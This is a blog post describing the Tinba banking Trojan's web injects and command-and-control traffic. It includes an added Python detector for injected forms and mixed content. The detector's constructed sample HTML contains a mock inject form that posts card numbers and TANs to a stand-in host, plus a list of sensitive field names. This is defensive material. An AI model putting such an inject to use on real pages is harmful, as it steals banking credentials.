Thursday, May 31, 2012

Tinba Banking Trojan Proves Size Doesn't Matter When it Comes to Malware

It’s often said that good things come in small packages. Apparently the same rings true for very, very bad things.

Researchers over at CSIS Security have discovered what they describe as the world’s smallest banking Trojan, which they’ve named “Tinba” – short for Tiny Banker.

Upon infection, Tinba will hook itself into a variety of running processes including explorer.exe and svchost.exe, along with major browser processes like firefox.exe and iexplore.exe.

Whenever a user visits one of the targeted banking sites, Tinba will manipulate the page by injecting pages or forms to trick the end-user into supplying sensitive financial information like a credit card number or transaction authentication number (TAN).

The list of financial websites targeted by Tinba is said to be very small, but it’s important to note that the malware can inject insecure elements from external sites/servers into a supposedly secure session (HTTPS).
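As an added illustration of the two behaviours described above (forms grafted onto a banking page to harvest card numbers or TANs, and plain-HTTP content pulled into an HTTPS session), the following Python script runs a few defender-side checks over a page's HTML. It is example code written for this page, not part of the original post or of CSIS Security's analysis, and it knows nothing about the real Tinba inject; the sample HTML, the `bank.example`/`injected.example` hostnames and the list of sensitive field names are all constructed for the demonstration.

```python
"""Heuristic checks for web-inject symptoms on a banking page:
 - forms whose action posts to an origin other than the page's own
 - plain-http scripts/images/iframes loaded into an https page (mixed content)
 - input fields whose names ask for a TAN, card number or similar secret
Added example; the sample page below is constructed, not a real bank or inject.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: the bank's own login form, followed by an injected
# plain-http script and an injected form that posts card number + TAN
# to a third-party host (the pattern described in the post, not real data).
SAMPLE_PAGE_URL = "https://bank.example/login"
SAMPLE_HTML = """
<html><body>
<form action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<script src="http://injected.example/inject.js"></script>
<form action="http://injected.example/collect" method="post">
  <input name="cardnumber"><input name="tan">
</form>
</body></html>
"""

# Field names a login page should never ask for (assumed list, extend as needed).
SENSITIVE_FIELD_NAMES = {"tan", "card", "cardnumber", "cvv", "pin"}


def origin_of(url):
    """Scheme + host + port, the same notion of origin the browser uses."""
    p = urlparse(url)
    return (p.scheme, p.hostname, p.port)


class InjectFinder(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_origin = origin_of(page_url)
        self.findings = []            # list of (kind, detail) tuples
        self._in_foreign_form = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # Resolve relative actions against the page URL before comparing origins.
            target = urljoin(self.page_url, a.get("action", ""))
            self._in_foreign_form = origin_of(target) != self.page_origin
            if self._in_foreign_form:
                self.findings.append(("cross-origin-form", target))
        elif tag in ("script", "img", "iframe") and "src" in a:
            src = urljoin(self.page_url, a["src"])
            if urlparse(self.page_url).scheme == "https" and urlparse(src).scheme == "http":
                self.findings.append(("mixed-content", src))
        elif tag == "input":
            name = a.get("name", "").lower()
            if name in SENSITIVE_FIELD_NAMES:
                self.findings.append(("sensitive-field", name))

    def handle_endtag(self, tag):
        if tag == "form":
            self._in_foreign_form = False


def find_injects(page_url, html):
    """Return the list of (kind, detail) findings for one page."""
    parser = InjectFinder(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, detail in find_injects(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

The same checks can be run from a browser extension or a proxy that sees the rendered DOM rather than the server's HTML; comparing the two is in fact the more useful test, because an inject that hooks the browser process changes what the user sees without changing what the bank sent.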

Like other banking Trojans, Tinba uses the RC4 encryption algorithm when communicating with its command & control (C&C) servers. Four C&C domains are hardcoded within the malware, serving as a “phone home” list for Tinba to run through should any of the domains fail to respond. The last thing the attackers would want to do is lose track of their prey.

All of this is done with 20KB worth of code, free of any packing or advanced encryption, and is proof that data-pilfering malware doesn’t require a large file size. Unfortunately, a smaller file size typically means a lower antivirus detection rate.

Be careful what files you download and be sure to keep your operating system and antivirus software up-to-date to minimize your chances of infection. And keep a sharp eye out for any suspicious activity when using banking websites (such as unusual requests for confidential information and the like).

